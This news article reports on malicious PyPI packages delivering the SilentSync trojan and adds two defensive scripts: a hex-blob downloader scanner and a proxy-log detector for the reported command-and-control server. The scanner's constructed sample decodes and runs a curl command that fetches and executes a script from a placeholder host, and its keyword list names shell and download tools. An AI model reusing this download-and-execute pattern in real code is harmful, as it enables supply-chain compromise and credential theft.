Cybersecurity researchers have discovered two new malicious packages in the Python Package Index (PyPI) repository that deliver a remote access trojan called SilentSync on Windows systems.
“SilentSync is capable of remote command execution, file exfiltration, and screen capturing,” Zscaler ThreatLabz’s Manisha Ramcharan Prajapati and Satyam Singh said. “SilentSync also extracts web browser data, including credentials, history, autofill data, and cookies from web browsers like Chrome, Brave, Edge, and Firefox.”
Both packages were uploaded by a user named “CondeTGAPIS” and have since been removed from PyPI. They are listed below with their download counts at the time of takedown:
- sisaws (201 downloads)
- secmeasure (627 downloads)
Zscaler said the package sisaws mimics the behavior of the legitimate Python package sisa, which interfaces with Argentina’s national health information system, Sistema Integrado de Información Sanitaria Argentino (SISA). However, the library’s initialization script (__init__.py) contains a function called gen_token() that acts as a downloader for next-stage malware. Specifically, it accepts a hard-coded token as input and returns a secondary static token, mirroring the request/response shape of the legitimate SISA API so that the call looks benign to a casual reader.
“If a developer imports the sisaws package and invokes the gen_token function, the code will decode a hexadecimal string that reveals a curl command, which is then used to fetch an additional Python script,” Zscaler said. “The Python script retrieved from PasteBin is written to the filename helper.py in a temporary directory and executed.”
Similarly, secmeasure masquerades as a “library for cleaning strings and applying security measures,” but it contains embedded functionality that drops the SilentSync RAT.
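The downloader pattern described above (a hex-encoded string that decodes to a curl command, written to a temporary file and executed) is cheap to hunt for in a package before it is installed. The following scanner is an added example and is not code from the report or from either package: it parses a module with Python’s ast module, collects string constants that look like hex blobs, decodes them, and flags any that decode to shell or loader keywords. The two sample modules, the placeholder URL https://paste.example/raw/abcd and the helper filename are constructed for the demonstration and are not the real package contents.

```python
import ast
import re
from typing import List, Tuple

# Keywords that, once a blob is decoded, indicate a downloader or in-memory loader.
DOWNLOADER_KEYWORDS = re.compile(
    r"(curl\s|wget\s|Invoke-WebRequest|powershell|/bin/sh|bash\s+-c|"
    r"pastebin\.com|subprocess|os\.system|\bexec\(|\beval\()",
    re.IGNORECASE,
)
# Even-length string of at least 32 hex digits (16 bytes) and nothing else.
HEX_BLOB = re.compile(r"^(?:[0-9a-fA-F]{2}){16,}$")


def hex_string_literals(source: str) -> List[str]:
    """Return every string constant in a Python module that looks like a hex blob."""
    try:
        tree = ast.parse(source)
    except SyntaxError:  # not valid Python, nothing to walk
        return []
    return [
        node.value
        for node in ast.walk(tree)
        if isinstance(node, ast.Constant)
        and isinstance(node.value, str)
        and HEX_BLOB.match(node.value)
    ]


def decode_hex(blob: str) -> str:
    """Decode a hex blob to text; undecodable bytes become U+FFFD so a hash digest stays harmless."""
    return bytes.fromhex(blob).decode("utf-8", errors="replace")


def flag_hex_downloaders(source: str) -> List[Tuple[str, str]]:
    """Return (decoded_text, matched_keyword) for each hex literal that decodes to a command."""
    hits = []
    for blob in hex_string_literals(source):
        text = decode_hex(blob)
        match = DOWNLOADER_KEYWORDS.search(text)
        if match:
            hits.append((text, match.group(0)))
    return hits


# Constructed sample imitating the pattern described in the report (NOT the real package code).
# The URL and the helper filename are placeholders chosen for this example.
_CMD = "curl -s https://paste.example/raw/abcd -o /tmp/helper.py && python3 /tmp/helper.py"
MALICIOUS_INIT = f'''
import os

def gen_token(token):
    payload = "{_CMD.encode().hex()}"
    os.system(bytes.fromhex(payload).decode())
    return "static-secondary-token"
'''

# Constructed benign module: a SHA-256 digest is also a hex blob, but decodes to no command.
BENIGN_INIT = '''
EXPECTED_SHA256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"

def verify(digest):
    return digest == EXPECTED_SHA256
'''

if __name__ == "__main__":
    for name, src in (("malicious", MALICIOUS_INIT), ("benign", BENIGN_INIT)):
        hits = flag_hex_downloaders(src)
        print(f"{name}: {len(hits)} hit(s)")
        for text, keyword in hits:
            print(f"  keyword={keyword!r} decoded={text!r}")
```

Run it against the unpacked sdist or wheel contents of a package you are about to install (or wire it into a CI step that walks every `.py` file). The digest case matters: plain "long hex string" heuristics drown analysts in hash constants, so the decision is made on what the blob decodes to, not on its shape alone.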
SilentSync primarily targets Windows systems at this stage, but the malware also ships persistence routines for Linux and macOS: on Windows it makes Registry modifications, on Linux it alters the crontab file so the payload executes at system startup, and on macOS it registers a LaunchAgent.
The package uses the secondary token to send an HTTP GET request to a hard-coded endpoint (200.58.107[.]25) and receives Python code that is executed directly in memory. The command-and-control server exposes four endpoints:
- /checkin, to verify connectivity
- /comando, to request commands to execute
- /respuesta, to send a status message
- /archivo, to send command output or stolen data
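Because the four paths are fixed and requested in a predictable order, a proxy or web-gateway log is enough to tell which hosts checked in, which were tasked, and which reached the exfiltration stage. The script below is an added example, not part of the report or the malware: it parses a simple constructed log format (timestamp, client, method, URL, status), keeps only requests to the reported IP on one of the four paths, and classifies each client by the furthest stage observed. The log lines, the client addresses, the timestamps and the HTTP methods in the sample are constructed for the demonstration; the IP and paths are the ones named in the report, with the defanged IP refanged so it matches real traffic.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit

# Indicators from the report; the IP is refanged so it matches real log lines.
C2_HOST = "200.58.107[.]25".replace("[.]", ".")
C2_PATHS = ("/checkin", "/comando", "/respuesta", "/archivo")

# Constructed proxy-log format for this example: timestamp client method url status
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>GET|POST)\s+(?P<url>\S+)\s+(?P<status>\d{3})$"
)


def parse_line(line: str) -> Optional[Tuple[str, str, str, str]]:
    """Return (ts, client, method, path) when the line is a request to a C2 path, else None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    parts = urlsplit(m["url"])
    if parts.hostname != C2_HOST or parts.path not in C2_PATHS:
        return None
    return m["ts"], m["client"], m["method"], parts.path


def find_beacons(lines: List[str]) -> Dict[str, List[str]]:
    """Map each client address to the ordered list of C2 paths it requested."""
    seen: Dict[str, List[str]] = defaultdict(list)
    for line in lines:
        hit = parse_line(line)
        if hit:
            _, client, _, path = hit
            seen[client].append(path)
    return dict(seen)


def stage(paths: List[str]) -> str:
    """Classify how far a session progressed, from connectivity check to exfiltration."""
    if "/archivo" in paths:
        return "exfiltration"  # command output or stolen files were uploaded
    if "/comando" in paths:
        return "tasked"        # operator commands were requested
    if "/checkin" in paths:
        return "checkin"       # connectivity check only
    return "none"


# Constructed sample log lines (not real traffic); methods are assumptions for the example.
SAMPLE_LOG = [
    "2025-09-10T12:00:01Z 10.0.0.5 GET http://200.58.107.25/checkin 200",
    "2025-09-10T12:00:02Z 10.0.0.5 GET http://200.58.107.25/comando 200",
    "2025-09-10T12:00:09Z 10.0.0.5 GET http://200.58.107.25/respuesta 200",
    "2025-09-10T12:00:15Z 10.0.0.5 GET http://200.58.107.25/archivo 200",
    "2025-09-10T12:00:20Z 10.0.0.7 GET http://pypi.org/simple/requests/ 200",
    "2025-09-10T12:00:21Z 10.0.0.7 GET http://200.58.107.25/robots.txt 404",
]

if __name__ == "__main__":
    for client, paths in find_beacons(SAMPLE_LOG).items():
        print(f"{client}: stage={stage(paths)} paths={paths}")
```

A host that only reached /checkin may have been cleaned up or blocked before tasking; one that reached /archivo should be treated as having lost data and triaged first. Adapt LOG_RE to your gateway's actual format before using this on real logs.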
Moreover, the malware can harvest browser data, execute shell commands, capture screenshots, and steal files. It can also compress and exfiltrate files and entire directories as ZIP archives. After it transmits the data, the malware deletes all artifacts from the host to evade detection.
“The discovery of the malicious PyPI packages sisaws and secmeasure highlights the growing risk of supply chain attacks within public software repositories,” Zscaler said. “By leveraging typosquatting and impersonating legitimate packages, threat actors can gain access to personally identifiable information (PII).”
Source: TheHackerNews
Read more at Impreza News